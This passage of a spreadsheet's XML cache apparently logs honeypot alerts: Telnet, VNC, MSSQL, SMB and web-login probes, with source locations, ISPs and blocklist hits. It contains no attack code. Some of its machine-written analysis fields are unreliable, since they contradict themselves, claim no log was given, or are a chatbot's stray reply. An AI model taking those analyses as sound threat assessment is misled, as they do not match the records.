    <d v="2025-04-28T15:29:21"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Brute Force"/>
    <s v="high"/>
    <s v="SMA-LAB_corporatelogin_Login.NIPPONINDIAIM_HC1"/>
    <s v="443"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="NL"/>
    <s v="The Netherlands"/>
    <s v="NH"/>
    <s v="North Holland"/>
    <s v="Gemeente Amsterdam"/>
    <s v="Amsterdam"/>
    <s v="2759794"/>
    <s v="1012"/>
    <s v="52.3676"/>
    <s v="4.90414"/>
    <s v="394089"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="business"/>
    <s v="Palo Alto Networks"/>
    <s v="2021-02-03"/>
    <s v="PAN-22"/>
    <s v="2021-02-08"/>
    <s v="login"/>
    <s v="{HTTP_LOGIN:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:86ee:8b6f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="High"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="566"/>
    <x v="566"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T15:10:50"/>
    <d v="2023-12-03T17:31:00"/>
    <d v="2025-04-28T15:10:50"/>
    <n v="274"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SMB_H45&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_MT-CPA_H40&amp;&amp;SMA-LAB_SMB_H30&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_SMB_H6&amp;&amp;SMA-LAB_SMB_H34&amp;&amp;SMA-LAB_SMB_H46&amp;&amp;SMA-LAB_MSSQL_H5&amp;&amp;SMA-LAB_MSSQL_H46&amp;&amp;SMA-LAB_MSSQL_H13&amp;&amp;SMA-LAB_SMB_H32&amp;&amp;SMA-LAB_MSSQL_H2"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;445&amp;&amp;39533&amp;&amp;33415&amp;&amp;1433&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IR"/>
    <s v="Iran"/>
    <s v="23"/>
    <s v="Tehran"/>
    <s v="Shahrestān-e Tehrān"/>
    <s v="Tehran (District 6)"/>
    <s v="112931"/>
    <s v="NA"/>
    <s v="35.7373"/>
    <s v="51.4157"/>
    <s v="58224"/>
    <s v="Iran Telecommunication Company PJS"/>
    <s v="Iran Telecommunication Company PJS"/>
    <s v="business"/>
    <s v="Information Technology Company"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SMB:Incoming connection (85.185.64.219,53270)}&amp;&amp;{Data_SMB:Incoming connection (85.185.64.219,53331)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (85.185.64.219,58188)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (85.185.64.219,57090)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (85.185.64.219,57147)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (85.185.64.219,50048)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (85.185.64.219,49975)}&amp;&amp;{Data_SMB:Incoming connection (85.185.64.219,64261)}&amp;&amp;{Data_SMB:Incoming connection (85.185.64.219,64337)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:Incoming connection (85.185.64.219,62174)}&amp;&amp;{Data_SMB:Incoming connection (85.185.64.219,62261)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}&amp;&amp;{Data_SMB:AUTHENTICATE_MESSAGE (,)}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:55b9:40db"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="Data indicates a potential attempt to exploit a vulnerability in Microsoft SQL Server by accessing its management interface without authentication or authorization, which could allow an attacker to gain unauthorized access and extract sensitive information. This suggests a malicious actor is probing for weaknesses to inject malicious code or steal data. The absence of credentials (NA) implies the attacker may be attempting a brute-force login or exploiting a default setting vulnerability."/>
    <m/>
  </r>
  <r>
    <x v="567"/>
    <x v="567"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T15:10:50"/>
    <d v="2025-04-14T12:37:21"/>
    <d v="2025-04-28T15:10:50"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H7"/>
    <s v="1433&amp;&amp;NA"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9716"/>
    <s v="77.5946"/>
    <s v="24560"/>
    <s v="Bharti Airtel Limited"/>
    <s v="Bharti Airtel"/>
    <s v="residential"/>
    <s v="Bharti Airtel Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_MSSQl:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7aac:7b5a"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="This log indicates possible exploitation of a vulnerability, where an attacker is attempting to identify potential targets for further attack. The malicious activity involves scanning or probing the system to discover open ports or services. This could be a reconnaissance step before launching a more targeted attack."/>
    <s v="I'd be happy to help analyze the log data!_x000a__x000a_However, I don't see any log data provided. Could you please provide the log data so I can assist you in identifying the type of attack? _x000a__x000a_Once you provide the log data, I'll do my best to:_x000a__x000a_    Name the type of attack in a short phrase (max 2 words)."/>
  </r>
  <r>
    <x v="568"/>
    <x v="568"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T15:05:03"/>
    <d v="2025-04-28T15:05:03"/>
    <d v="2025-04-28T15:05:03"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:ssh']&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="low"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="high"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:ssh']"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="PL"/>
    <s v="Poland"/>
    <s v="14"/>
    <s v="Mazovia"/>
    <s v="Warszawa"/>
    <s v="Warsaw (Śródmieście)"/>
    <s v="756135"/>
    <s v="NA"/>
    <s v="52.2274"/>
    <s v="21.009"/>
    <s v="5617"/>
    <s v="TPNET"/>
    <s v="Orange Polska Spolka Akcyjna"/>
    <s v="consumer"/>
    <s v="Orange Polska S.A."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:530a:35a9"/>
    <s v="C-I"/>
    <s v="high"/>
    <s v="Low"/>
    <s v="No activity detected for TELNET service._x000a_TELNET is a remote access protocol that allows users to access and manage devices over a network._x000a_This lack of activity could indicate a benign or unknown situation, rather than malicious intent. &amp;&amp; The data indicates that there was an attempt to connect using Telnet, which is often used for malicious activities as it allows unauthorized access to systems._x000a_This connection could be an attempt to gain remote access or execute commands on the system without permission._x000a_The lack of a response (indicated by &quot;NA&quot;) suggests the attempted connection may have been unsuccessful."/>
    <s v="Telnet scan &amp;&amp; Telnet Attack"/>
  </r>
  <r>
    <x v="569"/>
    <x v="569"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T14:33:17"/>
    <d v="2025-03-25T05:48:34"/>
    <d v="2025-04-28T14:33:17"/>
    <n v="24"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="medium"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H13"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'dnsbl-2.uceprotect.net': ['unknown']&amp;&amp; 'dnsbl-3.uceprotect.net': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['spam'&amp;&amp; 'unknown'&amp;&amp; 'exploits']}"/>
    <n v="135"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="medium"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="PE"/>
    <s v="Pernambuco"/>
    <s v="Trindade"/>
    <s v="Trindade"/>
    <s v="3386042"/>
    <s v="NA"/>
    <s v="-7.76194"/>
    <s v="-40.2678"/>
    <s v="28126"/>
    <s v="BRISANET SERVICOS DE TELECOMUNICACOES LTDA"/>
    <s v="Brisanet Servicos De Telecomunicacoes S.A"/>
    <s v="business"/>
    <s v="Francisco Diego Araujo Vieira"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:bb13:cbc5"/>
    <s v="C-I"/>
    <s v="low&amp;&amp;medium"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="570"/>
    <x v="570"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T14:30:07"/>
    <d v="2025-04-28T13:51:40"/>
    <d v="2025-04-28T14:30:07"/>
    <n v="36"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="BA"/>
    <s v="Bosnia and Herzegovina"/>
    <s v="BIH"/>
    <s v="Federation of B&amp;H"/>
    <s v="Sarajevo Canton"/>
    <s v="Sarajevo"/>
    <s v="3191281"/>
    <s v="NA"/>
    <s v="43.8395"/>
    <s v="18.3197"/>
    <s v="42560"/>
    <s v="Telemach BH d.o.o. Sarajevo"/>
    <s v="TELEMACH BH"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="2007-02-22"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:4def:180f"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="571"/>
    <x v="571"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T14:10:28"/>
    <d v="2024-02-13T14:18:38"/>
    <d v="2025-04-28T14:10:28"/>
    <n v="277"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Suspicious Web Activity Detected&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_POP3_H44&amp;&amp;SMA-LAB_MT-CPA_H1&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H29"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;23&amp;&amp;39670&amp;&amp;110&amp;&amp;20302&amp;&amp;9100&amp;&amp;80&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;GET&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '149.102.153.168:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:afc7:6ce4"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="572"/>
    <x v="572"/>
    <s v="ns5023791.ip-148-113-0.net"/>
    <x v="0"/>
    <d v="2025-04-28T14:07:12"/>
    <d v="2025-04-28T14:07:12"/>
    <d v="2025-04-28T14:07:12"/>
    <n v="1"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Brute Force"/>
    <s v="high"/>
    <s v="SMA-LAB_corporatelogin_Login.NIPPONINDIAIM_HC1"/>
    <s v="443"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Raigad"/>
    <s v="Navi Mumbai (Panvel)"/>
    <s v="6619347"/>
    <s v="NA"/>
    <s v="18.9118"/>
    <s v="73.1947"/>
    <s v="16276"/>
    <s v="OVH"/>
    <s v="Ovh Sas"/>
    <s v="hosting"/>
    <s v="Ovhtech R&amp;D (India) Private Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login"/>
    <s v="{HTTP_LOGIN:Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Mobile Safari/537.36}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <s v="None"/>
    <x v="1"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="::ffff:9471:68"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="High"/>
    <s v="An unknown device on Android 10 is attempting to log in to the HTTP service using a suspicious browser string that may be spoofed or fake. The user agent suggests a Chrome browser but with an unusually high version number. This could indicate malicious login attempts from a scripted source. &amp;&amp; An unknown device is attempting to access an HTTP login interface, possibly using a stolen or spoofed user agent to disguise its true nature. The device is running Android 10 on a kernel version not specified but likely outdated. The browser type and version suggest it may be a common mobile browsing setup."/>
    <s v="Brute Login &amp;&amp; Password Stealing"/>
  </r>
  <r>
    <x v="573"/>
    <x v="573"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T13:50:26"/>
    <d v="2025-04-26T10:17:19"/>
    <d v="2025-04-28T13:50:26"/>
    <n v="11"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_VNC_H43&amp;&amp;SMA-LAB_VNC_HC1"/>
    <s v="5900"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']}"/>
    <n v="39"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="SG"/>
    <s v="Ho Chi Minh"/>
    <s v="NA"/>
    <s v="Ho Chi Minh City"/>
    <s v="1566083"/>
    <s v="NA"/>
    <s v="10.8231"/>
    <s v="106.63"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VNPT-VNNIC"/>
    <s v="residential"/>
    <s v="VietNam Post and Telecom Corporation"/>
    <s v="2010-08-16"/>
    <s v="VNPT-VN"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_VNC:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ea8:c6e7"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <s v="The data indicates an attempted VNC connection, suggesting a potential malware or unauthorized access attempt to a remote desktop. The absence of any further information implies the attempt was unsuccessful or no action was taken. This could be a reconnaissance probe from an attacker. &amp;&amp; No VNC login attempt detected, suggesting no malicious activity related to remote access via this service. _x000a_However, it's worth noting that lack of VNC activity does not necessarily indicate security. &amp;&amp; No VNC (Virtual Network Computing) activity was detected, but this lack of data could be due to legitimate non-use of the service or an issue with logging. _x000a_Typically, logs for VNC services would show successful connections or attempts even if no actual traffic occurred, so this absence is unusual."/>
    <m/>
  </r>
  <r>
    <x v="574"/>
    <x v="574"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T13:42:23"/>
    <d v="2025-04-28T13:41:18"/>
    <d v="2025-04-28T13:42:23"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Brute Force"/>
    <s v="high"/>
    <s v="SMA-LAB_corporatelogin_Login.NIPPONINDIAIM_HC1"/>
    <s v="443"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KA"/>
    <s v="Karnataka"/>
    <s v="Bengaluru Urban"/>
    <s v="Bengaluru (Vasanth Nagar)"/>
    <s v="1277333"/>
    <s v="560056"/>
    <s v="12.9834"/>
    <s v="77.5956"/>
    <s v="55824"/>
    <s v="National Knowledge Network"/>
    <s v="EDCSCEG"/>
    <s v="business"/>
    <s v="Edcsceg"/>
    <s v="2024-02-07"/>
    <s v="EDCSCEG"/>
    <s v="None"/>
    <s v="login"/>
    <s v="{HTTP_LOGIN:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/135.0.0.0 Safari/537.36}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:9d0f:9efa"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="High"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="575"/>
    <x v="575"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T13:10:50"/>
    <d v="2023-07-27T09:39:32"/>
    <d v="2025-04-28T13:10:50"/>
    <n v="610"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MSSQL_H10&amp;&amp;SMA-LAB_MSSQL_H18&amp;&amp;SMA-LAB_LDAP_H40&amp;&amp;SMA-LAB_SMB_H32&amp;&amp;SMA-LAB_MT-CPA_H10&amp;&amp;SMA-LAB_MSSQL_H45&amp;&amp;SMA-LAB_MSSQL_H32&amp;&amp;SMA-LAB_MSSQL_H8&amp;&amp;SMA-LAB_MSSQL_H7&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H27"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;1433&amp;&amp;389&amp;&amp;445&amp;&amp;64028&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="TS"/>
    <s v="Telangana"/>
    <s v="Hyderabad"/>
    <s v="Hyderabad (Saifābād)"/>
    <s v="1269843"/>
    <s v="500001"/>
    <s v="17.4063"/>
    <s v="78.4675"/>
    <s v="18229"/>
    <s v="CtrlS"/>
    <s v="Pioneer Integrated - NOC"/>
    <s v="hosting"/>
    <s v="Pioneer Integrated Network Solutions Private Limited"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:2d71:bd04"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <s v="No log data provided, unable to analyze. _x000a__x000a_(This is a default response since there's no actual log data given for analysis.)"/>
    <m/>
  </r>
  <r>
    <x v="576"/>
    <x v="576"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-28T13:10:26"/>
    <d v="2025-04-24T04:45:31"/>
    <d v="2025-04-28T13:10:26"/>
    <n v="33"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="EU"/>
    <s v="Europe"/>
    <s v="DE"/>
    <s v="Germany"/>
    <s v="BY"/>
    <s v="Bavaria"/>
    <s v="Lower Bavaria"/>
    <s v="Hauzenberg (Germannsdorf)"/>
    <s v="2908661"/>
    <s v="94051"/>
    <s v="48.6242"/>
    <s v="13.6687"/>
    <s v="51396"/>
    <s v="Pfcloud UG"/>
    <s v="Pfcloud UG"/>
    <s v="hosting"/>
    <s v="Pfcloud UG"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:b041:9543"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
